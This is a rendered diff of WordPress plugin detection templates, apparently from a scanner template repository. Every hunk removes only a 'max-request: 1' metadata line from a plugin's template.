tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/coblocks/
|
- https://wordpress.org/plugins/coblocks/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: coblocks
|
plugin_namespace: coblocks
|
||||||
wpscan: https://wpscan.com/plugin/coblocks
|
wpscan: https://wpscan.com/plugin/coblocks
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/code-snippets/
|
- https://wordpress.org/plugins/code-snippets/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: code-snippets
|
plugin_namespace: code-snippets
|
||||||
wpscan: https://wpscan.com/plugin/code-snippets
|
wpscan: https://wpscan.com/plugin/code-snippets
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/coming-soon/
|
- https://wordpress.org/plugins/coming-soon/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: coming-soon
|
plugin_namespace: coming-soon
|
||||||
wpscan: https://wpscan.com/plugin/coming-soon
|
wpscan: https://wpscan.com/plugin/coming-soon
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/complianz-gdpr/
|
- https://wordpress.org/plugins/complianz-gdpr/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: complianz-gdpr
|
plugin_namespace: complianz-gdpr
|
||||||
wpscan: https://wpscan.com/plugin/complianz-gdpr
|
wpscan: https://wpscan.com/plugin/complianz-gdpr
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/contact-form-7-honeypot/
|
- https://wordpress.org/plugins/contact-form-7-honeypot/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: contact-form-7-honeypot
|
plugin_namespace: contact-form-7-honeypot
|
||||||
wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
|
wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/contact-form-7/
|
- https://wordpress.org/plugins/contact-form-7/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: contact-form-7
|
plugin_namespace: contact-form-7
|
||||||
wpscan: https://wpscan.com/plugin/contact-form-7
|
wpscan: https://wpscan.com/plugin/contact-form-7
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/contact-form-cfdb7/
|
- https://wordpress.org/plugins/contact-form-cfdb7/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: contact-form-cfdb7
|
plugin_namespace: contact-form-cfdb7
|
||||||
wpscan: https://wpscan.com/plugin/contact-form-cfdb7
|
wpscan: https://wpscan.com/plugin/contact-form-cfdb7
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/cookie-law-info/
|
- https://wordpress.org/plugins/cookie-law-info/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: cookie-law-info
|
plugin_namespace: cookie-law-info
|
||||||
wpscan: https://wpscan.com/plugin/cookie-law-info
|
wpscan: https://wpscan.com/plugin/cookie-law-info
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/cookie-notice/
|
- https://wordpress.org/plugins/cookie-notice/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: cookie-notice
|
plugin_namespace: cookie-notice
|
||||||
wpscan: https://wpscan.com/plugin/cookie-notice
|
wpscan: https://wpscan.com/plugin/cookie-notice
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/creame-whatsapp-me/
|
- https://wordpress.org/plugins/creame-whatsapp-me/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: creame-whatsapp-me
|
plugin_namespace: creame-whatsapp-me
|
||||||
wpscan: https://wpscan.com/plugin/creame-whatsapp-me
|
wpscan: https://wpscan.com/plugin/creame-whatsapp-me
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/creative-mail-by-constant-contact/
|
- https://wordpress.org/plugins/creative-mail-by-constant-contact/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: creative-mail-by-constant-contact
|
plugin_namespace: creative-mail-by-constant-contact
|
||||||
wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
|
wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/custom-css-js/
|
- https://wordpress.org/plugins/custom-css-js/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: custom-css-js
|
plugin_namespace: custom-css-js
|
||||||
wpscan: https://wpscan.com/plugin/custom-css-js
|
wpscan: https://wpscan.com/plugin/custom-css-js
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/custom-fonts/
|
- https://wordpress.org/plugins/custom-fonts/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: custom-fonts
|
plugin_namespace: custom-fonts
|
||||||
wpscan: https://wpscan.com/plugin/custom-fonts
|
wpscan: https://wpscan.com/plugin/custom-fonts
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/custom-post-type-ui/
|
- https://wordpress.org/plugins/custom-post-type-ui/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: custom-post-type-ui
|
plugin_namespace: custom-post-type-ui
|
||||||
wpscan: https://wpscan.com/plugin/custom-post-type-ui
|
wpscan: https://wpscan.com/plugin/custom-post-type-ui
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/disable-comments/
|
- https://wordpress.org/plugins/disable-comments/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: disable-comments
|
plugin_namespace: disable-comments
|
||||||
wpscan: https://wpscan.com/plugin/disable-comments
|
wpscan: https://wpscan.com/plugin/disable-comments
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/disable-gutenberg/
|
- https://wordpress.org/plugins/disable-gutenberg/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: disable-gutenberg
|
plugin_namespace: disable-gutenberg
|
||||||
wpscan: https://wpscan.com/plugin/disable-gutenberg
|
wpscan: https://wpscan.com/plugin/disable-gutenberg
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/duplicate-page/
|
- https://wordpress.org/plugins/duplicate-page/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: duplicate-page
|
plugin_namespace: duplicate-page
|
||||||
wpscan: https://wpscan.com/plugin/duplicate-page
|
wpscan: https://wpscan.com/plugin/duplicate-page
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/duplicate-post/
|
- https://wordpress.org/plugins/duplicate-post/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: duplicate-post
|
plugin_namespace: duplicate-post
|
||||||
wpscan: https://wpscan.com/plugin/duplicate-post
|
wpscan: https://wpscan.com/plugin/duplicate-post
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/duplicator/
|
- https://wordpress.org/plugins/duplicator/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: duplicator
|
plugin_namespace: duplicator
|
||||||
wpscan: https://wpscan.com/plugin/duplicator
|
wpscan: https://wpscan.com/plugin/duplicator
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/duracelltomi-google-tag-manager/
|
- https://wordpress.org/plugins/duracelltomi-google-tag-manager/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: duracelltomi-google-tag-manager
|
plugin_namespace: duracelltomi-google-tag-manager
|
||||||
wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
|
wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/easy-fancybox/
|
- https://wordpress.org/plugins/easy-fancybox/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: easy-fancybox
|
plugin_namespace: easy-fancybox
|
||||||
wpscan: https://wpscan.com/plugin/easy-fancybox
|
wpscan: https://wpscan.com/plugin/easy-fancybox
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/easy-table-of-contents/
|
- https://wordpress.org/plugins/easy-table-of-contents/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: easy-table-of-contents
|
plugin_namespace: easy-table-of-contents
|
||||||
wpscan: https://wpscan.com/plugin/easy-table-of-contents
|
wpscan: https://wpscan.com/plugin/easy-table-of-contents
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/easy-wp-smtp/
|
- https://wordpress.org/plugins/easy-wp-smtp/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: easy-wp-smtp
|
plugin_namespace: easy-wp-smtp
|
||||||
wpscan: https://wpscan.com/plugin/easy-wp-smtp
|
wpscan: https://wpscan.com/plugin/easy-wp-smtp
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/elementor/
|
- https://wordpress.org/plugins/elementor/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: elementor
|
plugin_namespace: elementor
|
||||||
wpscan: https://wpscan.com/plugin/elementor
|
wpscan: https://wpscan.com/plugin/elementor
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/elementskit-lite/
|
- https://wordpress.org/plugins/elementskit-lite/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: elementskit-lite
|
plugin_namespace: elementskit-lite
|
||||||
wpscan: https://wpscan.com/plugin/elementskit-lite
|
wpscan: https://wpscan.com/plugin/elementskit-lite
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/enable-media-replace/
|
- https://wordpress.org/plugins/enable-media-replace/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: enable-media-replace
|
plugin_namespace: enable-media-replace
|
||||||
wpscan: https://wpscan.com/plugin/enable-media-replace
|
wpscan: https://wpscan.com/plugin/enable-media-replace
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/envato-elements/
|
- https://wordpress.org/plugins/envato-elements/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: envato-elements
|
plugin_namespace: envato-elements
|
||||||
wpscan: https://wpscan.com/plugin/envato-elements
|
wpscan: https://wpscan.com/plugin/envato-elements
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/essential-addons-for-elementor-lite/
|
- https://wordpress.org/plugins/essential-addons-for-elementor-lite/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: essential-addons-for-elementor-lite
|
plugin_namespace: essential-addons-for-elementor-lite
|
||||||
wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
|
wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/ewww-image-optimizer/
|
- https://wordpress.org/plugins/ewww-image-optimizer/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: ewww-image-optimizer
|
plugin_namespace: ewww-image-optimizer
|
||||||
wpscan: https://wpscan.com/plugin/ewww-image-optimizer
|
wpscan: https://wpscan.com/plugin/ewww-image-optimizer
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/facebook-for-woocommerce/
|
- https://wordpress.org/plugins/facebook-for-woocommerce/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: facebook-for-woocommerce
|
plugin_namespace: facebook-for-woocommerce
|
||||||
wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
|
wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/fast-indexing-api/
|
- https://wordpress.org/plugins/fast-indexing-api/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: fast-indexing-api
|
plugin_namespace: fast-indexing-api
|
||||||
wpscan: https://wpscan.com/plugin/fast-indexing-api
|
wpscan: https://wpscan.com/plugin/fast-indexing-api
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/favicon-by-realfavicongenerator/
|
- https://wordpress.org/plugins/favicon-by-realfavicongenerator/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: favicon-by-realfavicongenerator
|
plugin_namespace: favicon-by-realfavicongenerator
|
||||||
wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
|
wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/flamingo/
|
- https://wordpress.org/plugins/flamingo/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: flamingo
|
plugin_namespace: flamingo
|
||||||
wpscan: https://wpscan.com/plugin/flamingo
|
wpscan: https://wpscan.com/plugin/flamingo
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/fluentform/
|
- https://wordpress.org/plugins/fluentform/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: fluentform
|
plugin_namespace: fluentform
|
||||||
wpscan: https://wpscan.com/plugin/fluentform
|
wpscan: https://wpscan.com/plugin/fluentform
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/font-awesome/
|
- https://wordpress.org/plugins/font-awesome/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: font-awesome
|
plugin_namespace: font-awesome
|
||||||
wpscan: https://wpscan.com/plugin/font-awesome
|
wpscan: https://wpscan.com/plugin/font-awesome
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/force-regenerate-thumbnails/
|
- https://wordpress.org/plugins/force-regenerate-thumbnails/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: force-regenerate-thumbnails
|
plugin_namespace: force-regenerate-thumbnails
|
||||||
wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
|
wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/formidable/
|
- https://wordpress.org/plugins/formidable/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: formidable
|
plugin_namespace: formidable
|
||||||
wpscan: https://wpscan.com/plugin/formidable
|
wpscan: https://wpscan.com/plugin/formidable
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/forminator/
|
- https://wordpress.org/plugins/forminator/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: forminator
|
plugin_namespace: forminator
|
||||||
wpscan: https://wpscan.com/plugin/forminator
|
wpscan: https://wpscan.com/plugin/forminator
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/ga-google-analytics/
|
- https://wordpress.org/plugins/ga-google-analytics/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: ga-google-analytics
|
plugin_namespace: ga-google-analytics
|
||||||
wpscan: https://wpscan.com/plugin/ga-google-analytics
|
wpscan: https://wpscan.com/plugin/ga-google-analytics
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/gdpr-cookie-compliance/
|
- https://wordpress.org/plugins/gdpr-cookie-compliance/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: gdpr-cookie-compliance
|
plugin_namespace: gdpr-cookie-compliance
|
||||||
wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
|
wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
|
- https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: google-analytics-dashboard-for-wp
|
plugin_namespace: google-analytics-dashboard-for-wp
|
||||||
wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
|
wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/google-analytics-for-wordpress/
|
- https://wordpress.org/plugins/google-analytics-for-wordpress/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: google-analytics-for-wordpress
|
plugin_namespace: google-analytics-for-wordpress
|
||||||
wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
|
wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/google-listings-and-ads/
|
- https://wordpress.org/plugins/google-listings-and-ads/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: google-listings-and-ads
|
plugin_namespace: google-listings-and-ads
|
||||||
wpscan: https://wpscan.com/plugin/google-listings-and-ads
|
wpscan: https://wpscan.com/plugin/google-listings-and-ads
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/google-site-kit/
|
- https://wordpress.org/plugins/google-site-kit/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: google-site-kit
|
plugin_namespace: google-site-kit
|
||||||
wpscan: https://wpscan.com/plugin/google-site-kit
|
wpscan: https://wpscan.com/plugin/google-site-kit
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/google-sitemap-generator/
|
- https://wordpress.org/plugins/google-sitemap-generator/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: google-sitemap-generator
|
plugin_namespace: google-sitemap-generator
|
||||||
wpscan: https://wpscan.com/plugin/google-sitemap-generator
|
wpscan: https://wpscan.com/plugin/google-sitemap-generator
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/gtranslate/
|
- https://wordpress.org/plugins/gtranslate/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: gtranslate
|
plugin_namespace: gtranslate
|
||||||
wpscan: https://wpscan.com/plugin/gtranslate
|
wpscan: https://wpscan.com/plugin/gtranslate
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue